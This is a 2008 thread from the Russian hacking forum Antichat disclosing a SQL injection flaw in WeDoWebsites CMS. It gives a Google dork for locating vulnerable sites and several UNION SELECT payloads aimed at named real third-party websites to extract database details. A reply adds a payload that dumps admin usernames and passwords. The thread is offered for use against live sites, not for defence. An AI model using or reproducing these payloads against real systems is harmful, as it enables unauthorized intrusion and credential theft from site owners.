Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   WeDoWebsites CMS Remote SQL Injection Vulnerability (https://forum.antichat.xyz/showthread.php?t=57312)

Ded MustD!e 04.01.2008 08:33
WeDoWebsites CMS Remote SQL Injection Vulnerability
 
*******************WeDoWebsites Content Management System*******************

AUTHOR: Ded MustD!e
GOOGLE DORK: "Powered by a WeDoWebsites Content Management System"
LINK: http://www.wedowebsites.co.nz/
EXPLOIT: http://site.com/xxxxx.php?pid=[SQL-INJ]
DETAILS: колонок 6, а вот таблицу с данными админа я подобрать так и не смог, хотя префикс вроде не используется; админка: http://site.com/admin/
EXAMPLES:

Код:
http://www.whiteelephant.co.nz/abeltasmanbackpackers.php?pid=-1+union+select+1,2,3,4,conca  t_ws(0x3a,user(),version(),database()),6/*
Код:
http://www.vistadesign.co.nz/landscapedesigners.php?pid=-1+union+select+1,2,concat_ws(0x3a,  user(),version(),database()),4,5,6/*
Код:
http://www.villaonthebay.co.nz/holidayhomegallery.php?pid=-1+union+select+1,2,3,4,concat_ws(  0x3a,user(),version(),database()),6/*
P.S. А вообще в гугле 5 страниц с примерами ;). Если кто-нибудь подберет таблицу, напишите сюда или мне в ПМ, буду благодарен.

************************************************** *************************

Piflit 04.01.2008 20:11
у меня выводится 11 полей =)
кмс платная что ли? в чем проблема узнать, какие там таблицы?

Ded MustD!e 05.01.2008 15:29
по-видимому да, я так и не нашел, где слить исходники

Nea7 05.01.2008 17:41
Код:
-1+union+select+1,2,3,4,concat_ws(0x3a,usr,pwd),6+from+adminusers+limit+0,1/*


Время: 18:21